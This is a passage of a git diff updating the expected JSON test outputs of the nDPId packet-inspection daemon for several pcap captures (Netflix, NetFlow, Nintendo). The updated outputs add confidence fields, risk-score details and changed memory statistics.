+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}}
+00159{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","total-events-serialized":407}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 6999/6999
 ~~ skipped flows.............: 0
@@ -412,10 +413,10 @@
 ~~ total active/idle flows...: 61/61
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4975869 bytes
-~~ total memory freed........: 4975869 bytes
-~~ total allocations/frees...: 106950/106950
+~~ total memory allocated....: 5039798 bytes
+~~ total memory freed........: 5039798 bytes
+~~ total allocations/frees...: 108540/108540
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
-~~ json string max len.......: 1370 chars
-~~ json string avg len.......: 837 chars
+~~ json string max len.......: 1475 chars
+~~ json string avg len.......: 889 chars
diff --git a/test/results/netflow-fritz.pcap.out b/test/results/netflow-fritz.pcap.out
index c77611386..055fe5ac3 100644
--- a/test/results/netflow-fritz.pcap.out
+++ b/test/results/netflow-fritz.pcap.out
@@ -1,8 +1,8 @@
 00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"netflow-fritz.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1498072707863,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":1498072707863,"pkt":"AAwRERERAAwRIiIiCABFKADQAABAAD8R1PvAqAABwKgBAVtYCAcAvAAAAAoAtFlKxZ0CWWXEAAQBAAACAHABzQAWAAEABIDPAAQAAGjygMz\/\/wAAaPKAzf\/\/AABo8gAHAAIACwACAAYAAgCxAAEAsAABALQAAgC1AAIAAgAEAM0AAgC5AAQAuAAEAAgABAAMAAQANgAEAFgAAgAEAAEAwAABgAH\/\/wAAaPIAAwA0AdIABwABAI8ABAApAAgAKgAIACgACAEwAAIBMQAEATIABAHTAAIAAQCOAAQAUv\/\/"}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","ndpi": {"proto":"NetFlow","breed":"Acceptable","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetFlow","breed":"Acceptable","category":"Network"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1498072707863,"flow_last_seen":1498072707863,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":0,"ts_msec":1498072707863,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.1.1","src_port":23384,"dst_port":2055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"netflow-fritz.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 686 chars
diff --git a/test/results/netflowv9.pcap.out b/test/results/netflowv9.pcap.out
index decee134b..d5dce5e94 100644
--- a/test/results/netflowv9.pcap.out
+++ b/test/results/netflowv9.pcap.out
@@ -1,10 +1,10 @@
 00441{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"netflowv9.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568213026961,"flow_last_seen":1568213026961,"flow_idle_time":180000,"flow_min_l4_payload_len":1376,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":1376,"midstream":0,"ts_msec":1568213026961,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02290{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1568213026961,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1418,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1418,"pkt_l4_len":1384,"ts_msec":1568213026961,"pkt":"ACWQ1Mz5rB9rrWosCABFAAV8LBZAAEARgqbAqAKGwKgC3r31CAkFaHVWAAkAECROCO5dZ6gMFm+miAAAAAEBAwQkAAoEJE1qKCRNaigAAAAAAAAAKAAAAAAAAAABBo0ou7J9QF7TxAskWgIAkwAAlYsAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJEzp1CRNjMsAAAAAAAUbtAAAAAAAAASjBhdDjcSK9gL7ko0BuxoAkwAAMhAAAFHMhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJEzp3CRNjKAAAAAAAB2wnwAAAAAAAAZqBor2AvsXQ43EAbuSjRoAkwAAUcwAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1ybSRNcm0AAAAAAAAAKAAAAAAAAAABBoOfghRcdiVS2B5evAIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1rLyRNay8AAAAAAAAAKAAAAAAAAAABBor09llcdiVKtb1pkQIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2QhyRNkIcAAAAAAAAAKAAAAAAAAAABBor0qxxcdiVS2B5S8QIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2JWyRNiVsAAAAAAAAAKAAAAAAAAAABBoOfWVu53tNywXcEGgIAkwADMXgAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1qjSRNao0AAAAAAAAALAAAAAAAAAABBor2xOMr4aaiqY0AFgIAkwAAseAAADIQ2GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAAoEJE2OYCRNjmAAAAAAAAAAKAAAAAAAAAABBo1UlODIXai05wABvQIAkwAAS+UAADIQ2GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAAoEJE11kyRNdisAAAAAAAACRwAAAAAAAAAKBoG7\/klQ1h8GKsoBuxsAkwAAFSIAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE11kyRNdisAAAAAAAAWPwAAAAAAAAAIBlDWHwaBu\/5JAbsqyh4AkwAAMhAAABUihHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2HTSRNh00AAAAAAAAAKAAAAAAAAAABBor1FpC5r10bvgPWnAIAkwAAiv4AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2Q4yRNkOMAAAAAAAAAKAAAAAAAAAABBoOfV4ZcdiVS2B5ZXgIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEAQIAVAAKBCRNhcskTYXLAAAAAAAAAHoAAAAAAAAAARHN+8cOjVQJ2YZdADUAkwAAMhAAAEB9hHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAQcA1AAKBiRNJ\/YkTYzBAAAAAAAAELEAAAAAAAAADwYgARa4LRoyANRG8rtzEZ1EIAFMoAAAAQMAAAAAgbv\/\/PfhAbvbAGwAACKxAAAyENhn2RiP2oR4rBWdQgAAAAAAAAAAAAAAAAAAAAAAAAoGJE0n9iRNjMEAAAAAAAAIZQAAAAAAAAAMBiABTKAAAAEDAAAAAIG7\/\/wgARa4LRoyANRG8rtzEZ1EAbv34RsAbAAAMhAAACKxhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAA="}
-00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568213026961,"flow_last_seen":1568213026961,"flow_idle_time":180000,"flow_min_l4_payload_len":1376,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":1376,"midstream":0,"ts_msec":1568213026961,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568213026961,"flow_last_seen":1568213026961,"flow_idle_time":180000,"flow_min_l4_payload_len":1376,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":1376,"midstream":0,"ts_msec":1568213026961,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}}
 02218{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1568213026961,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1366,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1366,"pkt_l4_len":1332,"ts_msec":1568213026961,"pkt":"ACWQ1Mz5rB9rrWosCABFAAVILBdAAEARgtnAqAKGwKgC3r31CAkFNLI1AAkAECROCO5dZ6gMFm+miQAAAAEBAwTEAAoEJE2HcCRNh3AAAAAAAAAAKAAAAAAAAAABBoOf7vm5sBu2oskXJAIAkwADHowAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2RayRNkWsAAAAAAAAAKAAAAAAAAAABBo0oBklcdiVS2B5jWQIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE10SSRNdEkAAAAAAAAAKAAAAAAAAAABBor2SWJcdiVKtb25AgIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE10KiRNdCoAAAAAAAAAKAAAAAAAAAABBoOfXsy5sBu2oskPGwIAkwADHowAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2NbCRNjWwAAAAAAAAAKAAAAAAAAAABBor1CjVZ+KxV434I\/gIAkwADFrkAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2HTiRNh2kAAAAAAAAArQAAAAAAAAACBhH8TA+K9gIpwNYUZxgAkwAAMhAAAALKhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2HWyRNh1sAAAAAAAAAnQAAAAAAAAACBor2AikR\/EwPFGfA1hgAkwAAAsoAADIQ2GfZGI\/ahHisFZ1CAAAAAAACAAAAAAAAAAAAAAAAAAoEJE1ycCRNcnAAAAAAAAAAKAAAAAAAAAABBor0oRm5sBu2oskF8wIAkwADHowAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1qhiRNaoYAAAAAAAAAKAAAAAAAAAABBo1Umhq5r10JuVyC6gIAkwAAiv4AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2KayRNin8AAAAAAAAAcwAAAAAAAAACBlCeJjiK9gKwnKIUZxgAkwAAMhAAAIUmhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2KeiRNinoAAAAAAAAASwAAAAAAAAABBor2ArBQniY4FGecohgAkwAAhSYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1v8SRNb\/EAAAAAAAAAKAAAAAAAAAABBor0mjxcdiVS2B5xQQIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2M1CRNjNQAAAAAAAAAKAAAAAAAAAABBo0otfJcdiVS2B5oFAIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1yviRNcr4AAAAAAAAAKAAAAAAAAAABBor0xzO5sBu2oskgMwIAkwADHowAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1+PiRNfj4AAAAAAAAAKAAAAAAAAAABBor2SCBcdiVS2B5xvwIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAECAFQACgQkTYXUJE2F1AAAAAAAAAFBAAAAAAAAAAERjVQJ2c37xw4ANYZdAJMAAEB9AAAyENhn2RiP2oR4rBWdQgAAAAAAAAAAAAAAAAAAAAAAAA=="}
 02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1568213026961,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1418,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1418,"pkt_l4_len":1384,"ts_msec":1568213026961,"pkt":"ACWQ1Mz5rB9rrWosCABFAAV8LBhAAEARgqTAqAKGwKgC3r31CAkFaPcdAAkAECROCO5dZ6gMFm+migAAAAEBAwQkAAoEJE18UiRNfFIAAAAAAAAAKAAAAAAAAAABBor1GIyKxVabf\/8hYQIAkwAANu0AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE188iRNfPIAAAAAAAAALAAAAAAAAAABBor1b6tTbs2s6Q\/qYQIAkwAAFQgAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE0b5CRNjsgAAAAAAAAD+QAAAAAAAAAKBtg6zy6Bu8nv4FQBux4AkwAAMhAAADtBhHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE0b7CRNjscAAAAAAAAH0wAAAAAAAAAIBoG7ye\/YOs8uAbvgVBoAkwAAO0EAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE13qiRNd6oAAAAAAAAAKAAAAAAAAAABBoG7U8O55eBgf\/8hYQIAkwAAodwAADIQ2GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAAoEJE2RLCRNkSwAAAAAAAAAKAAAAAAAAAABBoOfCHdcdiVS2B5lPQIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2C\/iRNhM0AAAAAAAAG0wAAAAAAAAAIBiOxkHGNVP4E02gBuxoAkwAAMhAAAEB9hHisFZ1C2GfZGI\/aAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2DFCRNhM0AAAAAAAATxgAAAAAAAAAJBo1U\/gQjsZBxAbvTaBoAkwAAQH0AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE11DSRNdQ0AAAAAAAAALAAAAAAAAAABBor2Qvpdrl9qcVMffAIAkwADFrkAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2BfSRNgX0AAAAAAAAAKAAAAAAAAAABBo1UDOe5B+tq\/5UAUAIAkwAAISwAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1+qyRNfqsAAAAAAAAALAAAAAAAAAABBor1Lmtlbfp7vHIBvQIAkwAAXaEAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE2AYyRNgGMAAAAAAAAAKAAAAAAAAAABBo1UHwVcdiVS2B5nAgIAkwAAixYAADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEJE1t3iRNbd4AAAAAAAAAKAAAAAAAAAABBoOfiSJcdiVKtb1noAIAkwAAixYAAzG32GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAAAAAoEAQIAVAAKBCRNg0AkTYNAAAAAAAAAApoAAAAAAAAAARGDn7MEo6zlqFf+E8QAkwAAMkwAAzG32GfZGI\/ahHisFZ1CAAAAAAAgAAAAAAAAAAAAAAAAAQcA1AAKBiRNI9AkTYY5AAAAAAAAALUAAAAAAAAAAwYgAUygIAMBAAAAAAAAAAEzKgX1AAAQAQEAAAAAuT+RAcrSAbsRAGwAADIQAAA4TYR4rBWdQthn2RiP2gAAAAAAAAAAAAAAAAAAAAAAAAoGJE0j2SRNhkIAAAAAAAABGwAAAAAAAAAEBioF9QAAEAEBAAAAALk\/kQEgAUygIAMBAAAAAAAAAAEzAbvK0hkAbAAAOE0AADIQ2GfZGI\/ahHisFZ1CAAAAAAAAAAAAAAAAAAAAAAA="}
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1568213026961,"flow_last_seen":1568213026962,"flow_idle_time":180000,"flow_min_l4_payload_len":1320,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":13468,"flow_avg_l4_payload_len":1346,"midstream":0,"ts_msec":1568213026962,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}}
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"netflowv9.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1568213026961,"flow_last_seen":1568213026962,"flow_idle_time":180000,"flow_min_l4_payload_len":1320,"flow_max_l4_payload_len":1376,"flow_tot_l4_payload_len":13468,"flow_avg_l4_payload_len":1346,"midstream":0,"ts_msec":1568213026962,"l3_proto":"ip4","src_ip":"192.168.2.134","dst_ip":"192.168.2.222","src_port":48629,"dst_port":2057,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NetFlow","breed":"Acceptable","category":"Network"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"netflowv9.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 10/10
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595119 bytes
-~~ total memory freed........: 4595119 bytes
-~~ total allocations/frees...: 99563/99563
+~~ total memory allocated....: 4680072 bytes
+~~ total memory freed........: 4680072 bytes
+~~ total allocations/frees...: 101153/101153
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
 ~~ json string max len.......: 2296 chars
diff --git a/test/results/nintendo.pcap.out b/test/results/nintendo.pcap.out
index b27ee5a9d..46904ca48 100644
--- a/test/results/nintendo.pcap.out
+++ b/test/results/nintendo.pcap.out
@@ -1,14 +1,14 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"nintendo.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320644,"flow_last_seen":1500731320644,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1500731320644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1500731320644,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"ts_msec":1500731320644,"pkt":"AA6OGXEMfLuKifuECABFAABYEUEAAEARTg7AqAxyWwjzI8uXwRgARM2+MquYZAJWA8uWATPgxkj4NJP7aMnpzfBBRQUJGYsmvR+Tfti6\/9NW0mVVtdYfmAlO0lOZx8+qpE3Q9Qrr"}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320644,"flow_last_seen":1500731320644,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1500731320644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","ndpi": {"proto":"Nintendo","breed":"Fun","category":"Game"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320644,"flow_last_seen":1500731320644,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1500731320644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}}
